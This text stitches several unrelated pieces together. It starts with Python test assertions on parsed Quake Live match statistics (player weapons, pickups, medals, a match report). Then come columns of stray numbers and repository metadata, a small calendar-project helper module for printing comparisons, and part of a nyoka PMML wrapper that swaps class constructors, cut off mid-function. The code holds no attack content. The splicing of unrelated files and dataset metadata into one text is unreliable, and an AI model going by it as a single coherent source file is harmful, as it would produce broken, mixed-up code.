assert e[74]['DATA']['WEAPONS']['GAUNTLET']['T'] is None # noqa
assert e[74]['DATA']['WEAPONS']['LIGHTNING']['D'] is None # noqa
assert e[74]['DATA']['WEAPONS']['LIGHTNING']['DG'] is None # noqa
assert e[74]['DATA']['WEAPONS']['LIGHTNING']['DR'] is None # noqa
assert e[74]['DATA']['WEAPONS']['LIGHTNING']['H'] == 78 # noqa
assert e[74]['DATA']['WEAPONS']['LIGHTNING']['K'] is None # noqa
assert e[74]['DATA']['WEAPONS']['LIGHTNING']['P'] is None # noqa
assert e[74]['DATA']['WEAPONS']['LIGHTNING']['S'] == 209 # noqa
assert e[74]['DATA']['WEAPONS']['LIGHTNING']['T'] is None # noqa
assert e[74]['DATA']['WEAPONS']['MACHINEGUN']['D'] is None # noqa
assert e[74]['DATA']['WEAPONS']['MACHINEGUN']['DG'] is None # noqa
assert e[74]['DATA']['WEAPONS']['MACHINEGUN']['DR'] is None # noqa
assert e[74]['DATA']['WEAPONS']['MACHINEGUN']['H'] == 23 # noqa
assert e[74]['DATA']['WEAPONS']['MACHINEGUN']['K'] is None # noqa
assert e[74]['DATA']['WEAPONS']['MACHINEGUN']['P'] is None # noqa
assert e[74]['DATA']['WEAPONS']['MACHINEGUN']['S'] == 152 # noqa
assert e[74]['DATA']['WEAPONS']['MACHINEGUN']['T'] is None # noqa
assert e[74]['DATA']['WEAPONS']['PLASMA']['D'] is None # noqa
assert e[74]['DATA']['WEAPONS']['PLASMA']['DG'] is None # noqa
assert e[74]['DATA']['WEAPONS']['PLASMA']['DR'] is None # noqa
assert e[74]['DATA']['WEAPONS']['PLASMA']['H'] == 19 # noqa
assert e[74]['DATA']['WEAPONS']['PLASMA']['K'] is None # noqa
assert e[74]['DATA']['WEAPONS']['PLASMA']['P'] is None # noqa
assert e[74]['DATA']['WEAPONS']['PLASMA']['S'] == 126 # noqa
assert e[74]['DATA']['WEAPONS']['PLASMA']['T'] is None # noqa
assert e[74]['DATA']['WEAPONS']['ROCKET']['D'] is None # noqa
assert e[74]['DATA']['WEAPONS']['ROCKET']['DG'] is None # noqa
assert e[74]['DATA']['WEAPONS']['ROCKET']['DR'] is None # noqa
assert e[74]['DATA']['WEAPONS']['ROCKET']['H'] == 18 # noqa
assert e[74]['DATA']['WEAPONS']['ROCKET']['K'] is None # noqa
assert e[74]['DATA']['WEAPONS']['ROCKET']['P'] is None # noqa
assert e[74]['DATA']['WEAPONS']['ROCKET']['S'] == 44 # noqa
assert e[74]['DATA']['WEAPONS']['ROCKET']['T'] is None # noqa
assert e[74]['DATA']['WEAPONS']['SHOTGUN']['D'] is None # noqa
assert e[74]['DATA']['WEAPONS']['SHOTGUN']['DG'] is None # noqa
assert e[74]['DATA']['WEAPONS']['SHOTGUN']['DR'] is None # noqa
assert e[74]['DATA']['WEAPONS']['SHOTGUN']['H'] == 0 # noqa
assert e[74]['DATA']['WEAPONS']['SHOTGUN']['K'] is None # noqa
assert e[74]['DATA']['WEAPONS']['SHOTGUN']['P'] is None # noqa
assert e[74]['DATA']['WEAPONS']['SHOTGUN']['S'] == 0 # noqa
assert e[74]['DATA']['WEAPONS']['SHOTGUN']['T'] is None # noqa
assert e[74]['DATA']['WIN'] == 0 # noqa
assert e[74]['TYPE'] == 'PLAYER_STATS' # noqa
assert e[75]['DATA']['ABORTED'] == False # noqa
assert e[75]['DATA']['BLUE_FLAG_PICKUPS'] == 0 # noqa
assert e[75]['DATA']['DAMAGE']['DEALT'] == 1185 # noqa
assert e[75]['DATA']['DAMAGE']['TAKEN'] == 1938 # noqa
assert e[75]['DATA']['DEATHS'] == 0 # noqa
assert e[75]['DATA']['HOLY_SHITS'] == 0 # noqa
assert e[75]['DATA']['KILLS'] == 0 # noqa
assert e[75]['DATA']['LOSE'] == 0 # noqa
assert e[75]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[75]['DATA']['MAX_STREAK'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['ACCURACY'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['ASSISTS'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['CAPTURES'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['COMBOKILL'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['DEFENDS'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['EXCELLENT'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['FIRSTFRAG'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['HEADSHOT'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['HUMILIATION'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['IMPRESSIVE'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['MIDAIR'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['PERFECT'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['PERFORATED'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['QUADGOD'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['RAMPAGE'] == 0 # noqa
assert e[75]['DATA']['MEDALS']['REVENGE'] == 0 # noqa
assert e[75]['DATA']['MODEL'] is None # noqa
assert e[75]['DATA']['NAME'] == 'Daemia' # noqa
assert e[75]['DATA']['NEUTRAL_FLAG_PICKUPS'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['AMMO'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['ARMOR'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['ARMOR_REGEN'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['BATTLESUIT'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['DOUBLER'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['FLIGHT'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['GREEN_ARMOR'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['GUARD'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['HASTE'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['HEALTH'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['INVIS'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['INVULNERABILITY'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['KAMIKAZE'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['MEDKIT'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['MEGA_HEALTH'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['OTHER_HOLDABLE'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['OTHER_POWERUP'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['PORTAL'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['QUAD'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['RED_ARMOR'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['REGEN'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['SCOUT'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['TELEPORTER'] == 0 # noqa
assert e[75]['DATA']['PICKUPS']['TOTAL_ARMOR'] == 325 # noqa
assert e[75]['DATA']['PICKUPS']['TOTAL_HEALTH'] == 80 # noqa
assert e[75]['DATA']['PICKUPS']['YELLOW_ARMOR'] == 0 # noqa
assert e[75]['DATA']['PLAY_TIME'] == 0 # noqa
assert e[75]['DATA']['QUIT'] is None # noqa
assert e[75]['DATA']['RANK'] == 0 # noqa
assert e[75]['DATA']['RED_FLAG_PICKUPS'] == 0 # noqa
assert e[75]['DATA']['SCORE'] == 0 # noqa
assert e[75]['DATA']['STEAM_ID'] == '254e24151c9e5466251073e6' # noqa
assert e[75]['DATA']['TEAM'] is None # noqa
assert e[75]['DATA']['TEAM_JOIN_TIME'] == 0 # noqa
assert e[75]['DATA']['TEAM_RANK'] is None # noqa
assert e[75]['DATA']['TIED_RANK'] is None # noqa
assert e[75]['DATA']['TIED_TEAM_RANK'] is None # noqa
assert e[75]['DATA']['TIME'] == 315.2 # noqa
assert e[75]['DATA']['WARMUP'] == False # noqa
assert e[75]['DATA']['WEAPONS']['LIGHTNING']['D'] is None # noqa
assert e[75]['DATA']['WEAPONS']['LIGHTNING']['DG'] is None # noqa
assert e[75]['DATA']['WEAPONS']['LIGHTNING']['DR'] is None # noqa
assert e[75]['DATA']['WEAPONS']['LIGHTNING']['H'] == 67 # noqa
assert e[75]['DATA']['WEAPONS']['LIGHTNING']['K'] is None # noqa
assert e[75]['DATA']['WEAPONS']['LIGHTNING']['P'] is None # noqa
assert e[75]['DATA']['WEAPONS']['LIGHTNING']['S'] == 497 # noqa
assert e[75]['DATA']['WEAPONS']['LIGHTNING']['T'] is None # noqa
assert e[75]['DATA']['WEAPONS']['MACHINEGUN']['D'] is None # noqa
assert e[75]['DATA']['WEAPONS']['MACHINEGUN']['DG'] is None # noqa
assert e[75]['DATA']['WEAPONS']['MACHINEGUN']['DR'] is None # noqa
assert e[75]['DATA']['WEAPONS']['MACHINEGUN']['H'] == 31 # noqa
assert e[75]['DATA']['WEAPONS']['MACHINEGUN']['K'] is None # noqa
assert e[75]['DATA']['WEAPONS']['MACHINEGUN']['P'] is None # noqa
assert e[75]['DATA']['WEAPONS']['MACHINEGUN']['S'] == 136 # noqa
assert e[75]['DATA']['WEAPONS']['MACHINEGUN']['T'] is None # noqa
assert e[75]['DATA']['WEAPONS']['PLASMA']['D'] is None # noqa
assert e[75]['DATA']['WEAPONS']['PLASMA']['DG'] is None # noqa
assert e[75]['DATA']['WEAPONS']['PLASMA']['DR'] is None # noqa
assert e[75]['DATA']['WEAPONS']['PLASMA']['H'] == 1 # noqa
assert e[75]['DATA']['WEAPONS']['PLASMA']['K'] is None # noqa
assert e[75]['DATA']['WEAPONS']['PLASMA']['P'] is None # noqa
assert e[75]['DATA']['WEAPONS']['PLASMA']['S'] == 10 # noqa
assert e[75]['DATA']['WEAPONS']['PLASMA']['T'] is None # noqa
assert e[75]['DATA']['WEAPONS']['ROCKET']['D'] is None # noqa
assert e[75]['DATA']['WEAPONS']['ROCKET']['DG'] is None # noqa
assert e[75]['DATA']['WEAPONS']['ROCKET']['DR'] is None # noqa
assert e[75]['DATA']['WEAPONS']['ROCKET']['H'] == 9 # noqa
assert e[75]['DATA']['WEAPONS']['ROCKET']['K'] is None # noqa
assert e[75]['DATA']['WEAPONS']['ROCKET']['P'] is None # noqa
assert e[75]['DATA']['WEAPONS']['ROCKET']['S'] == 22 # noqa
assert e[75]['DATA']['WEAPONS']['ROCKET']['T'] is None # noqa
assert e[75]['DATA']['WEAPONS']['SHOTGUN']['D'] is None # noqa
assert e[75]['DATA']['WEAPONS']['SHOTGUN']['DG'] is None # noqa
assert e[75]['DATA']['WEAPONS']['SHOTGUN']['DR'] is None # noqa
assert e[75]['DATA']['WEAPONS']['SHOTGUN']['H'] == 48 # noqa
assert e[75]['DATA']['WEAPONS']['SHOTGUN']['K'] is None # noqa
assert e[75]['DATA']['WEAPONS']['SHOTGUN']['P'] is None # noqa
assert e[75]['DATA']['WEAPONS']['SHOTGUN']['S'] == 330 # noqa
assert e[75]['DATA']['WEAPONS']['SHOTGUN']['T'] is None # noqa
assert e[75]['DATA']['WIN'] == 0 # noqa
assert e[75]['TYPE'] == 'PLAYER_STATS' # noqa
assert e[76]['DATA']['ABORTED'] == False # noqa
assert e[76]['DATA']['BLUE_FLAG_PICKUPS'] == 0 # noqa
assert e[76]['DATA']['DAMAGE']['DEALT'] == 871 # noqa
assert e[76]['DATA']['DAMAGE']['TAKEN'] == 2222 # noqa
assert e[76]['DATA']['DEATHS'] == 0 # noqa
assert e[76]['DATA']['HOLY_SHITS'] == 0 # noqa
assert e[76]['DATA']['KILLS'] == 0 # noqa
assert e[76]['DATA']['LOSE'] == 0 # noqa
assert e[76]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[76]['DATA']['MAX_STREAK'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['ACCURACY'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['ASSISTS'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['CAPTURES'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['COMBOKILL'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['DEFENDS'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['EXCELLENT'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['FIRSTFRAG'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['HEADSHOT'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['HUMILIATION'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['IMPRESSIVE'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['MIDAIR'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['PERFECT'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['PERFORATED'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['QUADGOD'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['RAMPAGE'] == 0 # noqa
assert e[76]['DATA']['MEDALS']['REVENGE'] == 0 # noqa
assert e[76]['DATA']['MODEL'] is None # noqa
assert e[76]['DATA']['NAME'] == 'Doom' # noqa
assert e[76]['DATA']['NEUTRAL_FLAG_PICKUPS'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['AMMO'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['ARMOR'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['ARMOR_REGEN'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['BATTLESUIT'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['DOUBLER'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['FLIGHT'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['GREEN_ARMOR'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['GUARD'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['HASTE'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['HEALTH'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['INVIS'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['INVULNERABILITY'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['KAMIKAZE'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['MEDKIT'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['MEGA_HEALTH'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['OTHER_HOLDABLE'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['OTHER_POWERUP'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['PORTAL'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['QUAD'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['RED_ARMOR'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['REGEN'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['SCOUT'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['TELEPORTER'] == 0 # noqa
assert e[76]['DATA']['PICKUPS']['TOTAL_ARMOR'] == 525 # noqa
assert e[76]['DATA']['PICKUPS']['TOTAL_HEALTH'] == 170 # noqa
assert e[76]['DATA']['PICKUPS']['YELLOW_ARMOR'] == 0 # noqa
assert e[76]['DATA']['PLAY_TIME'] == 0 # noqa
assert e[76]['DATA']['QUIT'] is None # noqa
assert e[76]['DATA']['RANK'] == 0 # noqa
assert e[76]['DATA']['RED_FLAG_PICKUPS'] == 0 # noqa
assert e[76]['DATA']['SCORE'] == 0 # noqa
assert e[76]['DATA']['STEAM_ID'] == '7727c59e2bf61c4a67428d15' # noqa
assert e[76]['DATA']['TEAM'] is None # noqa
assert e[76]['DATA']['TEAM_JOIN_TIME'] == 0 # noqa
assert e[76]['DATA']['TEAM_RANK'] is None # noqa
assert e[76]['DATA']['TIED_RANK'] is None # noqa
assert e[76]['DATA']['TIED_TEAM_RANK'] is None # noqa
assert e[76]['DATA']['TIME'] == 315.2 # noqa
assert e[76]['DATA']['WARMUP'] == False # noqa
assert e[76]['DATA']['WEAPONS']['LIGHTNING']['D'] is None # noqa
assert e[76]['DATA']['WEAPONS']['LIGHTNING']['DG'] is None # noqa
assert e[76]['DATA']['WEAPONS']['LIGHTNING']['DR'] is None # noqa
assert e[76]['DATA']['WEAPONS']['LIGHTNING']['H'] == 26 # noqa
assert e[76]['DATA']['WEAPONS']['LIGHTNING']['K'] is None # noqa
assert e[76]['DATA']['WEAPONS']['LIGHTNING']['P'] is None # noqa
assert e[76]['DATA']['WEAPONS']['LIGHTNING']['S'] == 156 # noqa
assert e[76]['DATA']['WEAPONS']['LIGHTNING']['T'] is None # noqa
assert e[76]['DATA']['WEAPONS']['MACHINEGUN']['D'] is None # noqa
assert e[76]['DATA']['WEAPONS']['MACHINEGUN']['DG'] is None # noqa
assert e[76]['DATA']['WEAPONS']['MACHINEGUN']['DR'] is None # noqa
assert e[76]['DATA']['WEAPONS']['MACHINEGUN']['H'] == 30 # noqa
assert e[76]['DATA']['WEAPONS']['MACHINEGUN']['K'] is None # noqa
assert e[76]['DATA']['WEAPONS']['MACHINEGUN']['P'] is None # noqa
assert e[76]['DATA']['WEAPONS']['MACHINEGUN']['S'] == 228 # noqa
assert e[76]['DATA']['WEAPONS']['MACHINEGUN']['T'] is None # noqa
assert e[76]['DATA']['WEAPONS']['PLASMA']['D'] is None # noqa
assert e[76]['DATA']['WEAPONS']['PLASMA']['DG'] is None # noqa
assert e[76]['DATA']['WEAPONS']['PLASMA']['DR'] is None # noqa
assert e[76]['DATA']['WEAPONS']['PLASMA']['H'] == 2 # noqa
assert e[76]['DATA']['WEAPONS']['PLASMA']['K'] is None # noqa
assert e[76]['DATA']['WEAPONS']['PLASMA']['P'] is None # noqa
assert e[76]['DATA']['WEAPONS']['PLASMA']['S'] == 6 # noqa
assert e[76]['DATA']['WEAPONS']['PLASMA']['T'] is None # noqa
assert e[76]['DATA']['WEAPONS']['ROCKET']['D'] is None # noqa
assert e[76]['DATA']['WEAPONS']['ROCKET']['DG'] is None # noqa
assert e[76]['DATA']['WEAPONS']['ROCKET']['DR'] is None # noqa
assert e[76]['DATA']['WEAPONS']['ROCKET']['H'] == 11 # noqa
assert e[76]['DATA']['WEAPONS']['ROCKET']['K'] is None # noqa
assert e[76]['DATA']['WEAPONS']['ROCKET']['P'] is None # noqa
assert e[76]['DATA']['WEAPONS']['ROCKET']['S'] == 24 # noqa
assert e[76]['DATA']['WEAPONS']['ROCKET']['T'] is None # noqa
assert e[76]['DATA']['WEAPONS']['SHOTGUN']['D'] is None # noqa
assert e[76]['DATA']['WEAPONS']['SHOTGUN']['DG'] is None # noqa
assert e[76]['DATA']['WEAPONS']['SHOTGUN']['DR'] is None # noqa
assert e[76]['DATA']['WEAPONS']['SHOTGUN']['H'] == 30 # noqa
assert e[76]['DATA']['WEAPONS']['SHOTGUN']['K'] is None # noqa
assert e[76]['DATA']['WEAPONS']['SHOTGUN']['P'] is None # noqa
assert e[76]['DATA']['WEAPONS']['SHOTGUN']['S'] == 275 # noqa
assert e[76]['DATA']['WEAPONS']['SHOTGUN']['T'] is None # noqa
assert e[76]['DATA']['WIN'] == 0 # noqa
assert e[76]['TYPE'] == 'PLAYER_STATS' # noqa
assert e[77]['DATA']['ABORTED'] is None # noqa
assert e[77]['DATA']['CAPTURE_LIMIT'] == 0 # noqa
assert e[77]['DATA']['EXIT_MSG'] == 'Fraglimit hit.' # noqa
assert e[77]['DATA']['FACTORY'] is None # noqa
assert e[77]['DATA']['FACTORY_TITLE'] is None # noqa
assert e[77]['DATA']['FIRST_SCORER'] is None # noqa
assert e[77]['DATA']['FRAG_LIMIT'] == 20 # noqa
assert e[77]['DATA']['GAME_LENGTH'] == 313000 # noqa
assert e[77]['DATA']['GAME_TYPE'] is None # noqa
assert e[77]['DATA']['INFECTED'] is None # noqa
assert e[77]['DATA']['INSTAGIB'] is None # noqa
assert e[77]['DATA']['LAST_LEAD_CHANGE_TIME'] is None # noqa
assert e[77]['DATA']['LAST_SCORER'] is None # noqa
assert e[77]['DATA']['LAST_TEAMSCORER'] is None # noqa
assert e[77]['DATA']['MAP'] == 'ASYLUM' # noqa
assert e[77]['DATA']['MATCH_GUID'] == '19b5bc9bf2e789eab15613dd3ee3e97b' # noqa
assert e[77]['DATA']['MERCY_LIMIT'] is None # noqa
assert e[77]['DATA']['QUADHOG'] is None # noqa
assert e[77]['DATA']['RESTARTED'] is None # noqa
assert e[77]['DATA']['ROUND_LIMIT'] is None # noqa
assert e[77]['DATA']['SCORE_LIMIT'] is None # noqa
assert e[77]['DATA']['SERVER_TITLE'] == 'noname' # noqa
assert e[77]['DATA']['TIME'] == 313.0 # noqa
assert e[77]['DATA']['TIME_LIMIT'] == 0 # noqa
assert e[77]['DATA']['TRAINING'] is None # noqa
assert e[77]['DATA']['TSCORE0'] is None # noqa
assert e[77]['DATA']['TSCORE1'] is None # noqa
assert e[77]['DATA']['WARMUP'] == False # noqa
assert e[77]['TYPE'] == 'MATCH_REPORT' # noqa
| 65.616815
| 125
| 0.537901
| 33,332
| 243,504
| 3.901416
| 0.01017
| 0.19809
| 0.311199
| 0.359515
| 0.991534
| 0.988496
| 0.941965
| 0.822127
| 0.450239
| 0
| 0
| 0.060847
| 0.227479
| 243,504
| 3,710
| 126
| 65.634501
| 0.630454
| 0.076126
| 0
| 0
| 0
| 0
| 0.290616
| 0.026342
| 0
| 0
| 0
| 0
| 0.994059
| 1
| 0.00054
| false
| 0
| 0.00108
| 0
| 0.00189
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
16858d2ebba9b5ce4fc857b1be28ea888659ba10
| 344
|
py
|
Python
|
gaurabda/GCUT.py
|
gopa810/gaurabda-calendar
|
92c36b5948e9bcbfe991f19f511371aff1cc0fcb
|
[
"MIT"
] | 4
|
2020-09-12T06:32:08.000Z
|
2022-01-15T09:31:31.000Z
|
gaurabda/GCUT.py
|
gopa810/gaurabda-calendar
|
92c36b5948e9bcbfe991f19f511371aff1cc0fcb
|
[
"MIT"
] | 2
|
2020-12-14T14:25:35.000Z
|
2020-12-15T19:06:51.000Z
|
gaurabda/GCUT.py
|
gopa810/gaurabda-calendar
|
92c36b5948e9bcbfe991f19f511371aff1cc0fcb
|
[
"MIT"
] | 4
|
2020-10-10T16:31:05.000Z
|
2021-08-20T17:23:01.000Z
|
def val(a, b, msg):
    """Print a pass/fail style comparison line for two values.

    Emits "<msg> ... OK" when *a* equals *b*; otherwise prints a line
    showing both values.  (The *msg* parameter shadows the module-level
    msg() helper inside this function body; callers are unaffected.)
    """
    if a == b:
        print(f'{msg} ... OK')
    else:
        print(f'{msg} ... Value left: {a}, value right: {b}')
def nval(a, b, msg):
    """Print a pass/fail style line asserting two values differ.

    Emits "<msg> ... OK" when *a* and *b* are NOT equal; otherwise
    prints a line showing both (equal) values.
    """
    if a != b:
        print(f'{msg} ... OK')
    else:
        print(f'{msg} ... Value left: {a}, value right: {b}')
def info(str):
    """Print *str* framed as a section header: "--- <str> ---".

    NOTE(review): the parameter name shadows the builtin ``str``; it is
    kept unchanged so keyword callers are unaffected.
    """
    print('--- {} ---'.format(str))
def msg(str):
    """Print *str* verbatim (thin wrapper over print for log symmetry).

    NOTE(review): the parameter name shadows the builtin ``str``; it is
    kept unchanged so the public signature stays identical.
    """
    print(str)
| 19.111111
| 61
| 0.456395
| 55
| 344
| 2.854545
| 0.290909
| 0.191083
| 0.229299
| 0.089172
| 0.726115
| 0.726115
| 0.726115
| 0.726115
| 0.726115
| 0.726115
| 0
| 0
| 0.287791
| 344
| 17
| 62
| 20.235294
| 0.640816
| 0
| 0
| 0.428571
| 0
| 0
| 0.357558
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.285714
| false
| 0
| 0
| 0
| 0.285714
| 0.428571
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
169c5c7fe26ffd91be75995f56da833a96e328e2
| 11,035
|
py
|
Python
|
nyoka/PMML44/wrapper44.py
|
vishalbelsare/nyoka
|
c08e83db2863a963d586b5853b82ef9d8cf799b2
|
[
"Apache-2.0"
] | 71
|
2020-08-24T07:59:56.000Z
|
2022-03-21T08:36:35.000Z
|
nyoka/PMML44/wrapper44.py
|
vishalbelsare/nyoka
|
c08e83db2863a963d586b5853b82ef9d8cf799b2
|
[
"Apache-2.0"
] | 16
|
2020-09-02T10:27:36.000Z
|
2022-03-31T05:37:12.000Z
|
nyoka/PMML44/wrapper44.py
|
vishalbelsare/nyoka
|
c08e83db2863a963d586b5853b82ef9d8cf799b2
|
[
"Apache-2.0"
] | 16
|
2020-09-17T15:01:33.000Z
|
2022-03-28T03:13:25.000Z
|
def parse(inFileName, silence=False):
    """Parse a PMML document with the stock generated constructors.

    Temporarily re-installs the original generated ``__init__``
    implementations (the generated parser expects them), runs
    ``parseSub``, then restores the wrapper constructors.

    Args:
        inFileName: path of the PMML document to parse.
        silence: forwarded to ``parseSub`` to suppress its output.

    Returns:
        Whatever ``parseSub`` returns (the parsed PMML object tree).
    """
    orig_init()
    try:
        result = parseSub(inFileName, silence)
    finally:
        # Bug fix: restore the wrapper constructors even when parsing
        # raises, so a failed parse no longer leaves the module stuck
        # with the stock __init__ implementations installed.
        new_init()
    return result
def new_init():
    """Monkey-patch ArrayType/Annotation/Timestamp/PMML constructors.

    Installs replacement ``__init__`` methods that accept a plain
    ``content`` argument and wrap it into a single MixedContainer entry,
    instead of the generated signatures that take pre-built ``content_``
    lists.  Behavior-preserving restyle of the generated code.
    """

    def ArrayType_init(self, content=None, n=None, type_=None, mixedclass_=None):
        self.original_tagname_ = None
        self.n = supermod._cast(None, n)
        self.type_ = supermod._cast(None, type_)
        self.mixedclass_ = supermod.MixedContainer if mixedclass_ is None else mixedclass_
        self.content_ = [supermod.MixedContainer(1, 2, "", str(content))]
        self.valueOf_ = str(content)

    def _mixed_text_init(self, content=None, Extension=None, mixedclass_=None):
        # Shared body for Annotation and Timestamp: both are
        # mixed-content elements holding an Extension list plus text.
        self.original_tagname_ = None
        self.Extension = [] if Extension is None else Extension
        self.mixedclass_ = supermod.MixedContainer if mixedclass_ is None else mixedclass_
        self.content_ = [supermod.MixedContainer(1, 2, "", str(content))]
        self.valueOf_ = str(content)

    def PMML_init(self, version='4.4', Header=None, MiningBuildTask=None, DataDictionary=None, TransformationDictionary=None, AssociationModel=None, AnomalyDetectionModel=None, BayesianNetworkModel=None, BaselineModel=None, ClusteringModel=None, GaussianProcessModel=None, GeneralRegressionModel=None, MiningModel=None, NaiveBayesModel=None, NearestNeighborModel=None, NeuralNetwork=None, RegressionModel=None, RuleSetModel=None, SequenceModel=None, Scorecard=None, SupportVectorMachineModel=None, TextModel=None, TimeSeriesModel=None, TreeModel=None, Extension=None):
        self.original_tagname_ = None
        self.version = supermod._cast(None, version)
        self.Header = Header
        self.MiningBuildTask = MiningBuildTask
        self.DataDictionary = DataDictionary
        self.TransformationDictionary = TransformationDictionary
        # Each model-list attribute defaults to a fresh empty list when
        # the caller passes None (never a shared mutable default).
        for attr_name, attr_value in (
            ('AssociationModel', AssociationModel),
            ('AnomalyDetectionModel', AnomalyDetectionModel),
            ('BayesianNetworkModel', BayesianNetworkModel),
            ('BaselineModel', BaselineModel),
            ('ClusteringModel', ClusteringModel),
            ('GaussianProcessModel', GaussianProcessModel),
            ('GeneralRegressionModel', GeneralRegressionModel),
            ('MiningModel', MiningModel),
            ('NaiveBayesModel', NaiveBayesModel),
            ('NearestNeighborModel', NearestNeighborModel),
            ('NeuralNetwork', NeuralNetwork),
            ('RegressionModel', RegressionModel),
            ('RuleSetModel', RuleSetModel),
            ('SequenceModel', SequenceModel),
            ('Scorecard', Scorecard),
            ('SupportVectorMachineModel', SupportVectorMachineModel),
            ('TextModel', TextModel),
            ('TimeSeriesModel', TimeSeriesModel),
            ('TreeModel', TreeModel),
            ('Extension', Extension),
        ):
            setattr(self, attr_name, [] if attr_value is None else attr_value)

    ArrayType.__init__ = ArrayType_init
    Annotation.__init__ = _mixed_text_init
    Timestamp.__init__ = _mixed_text_init
    PMML.__init__ = PMML_init
def orig_init():
    """Re-install the original generated-style constructors.

    Restores ``__init__`` implementations matching the generated
    superclass signatures (explicit ``valueOf_`` / ``content_`` list),
    undoing the wrappers installed by ``new_init``.  Behavior-preserving
    restyle of the generated code.
    """

    def ArrayType_init(self, n=None, type_=None, valueOf_=None, mixedclass_=None, content_=None):
        self.original_tagname_ = None
        self.n = supermod._cast(None, n)
        self.type_ = supermod._cast(None, type_)
        self.valueOf_ = valueOf_
        self.mixedclass_ = supermod.MixedContainer if mixedclass_ is None else mixedclass_
        self.content_ = [] if content_ is None else content_
        # The generated original assigns valueOf_ a second time; harmless.
        self.valueOf_ = valueOf_

    def _mixed_text_init(self, Extension=None, valueOf_=None, mixedclass_=None, content_=None):
        # Shared body for Annotation and Timestamp (identical in the
        # generated original).
        self.original_tagname_ = None
        self.Extension = [] if Extension is None else Extension
        self.valueOf_ = valueOf_
        self.mixedclass_ = supermod.MixedContainer if mixedclass_ is None else mixedclass_
        self.content_ = [] if content_ is None else content_
        self.valueOf_ = valueOf_

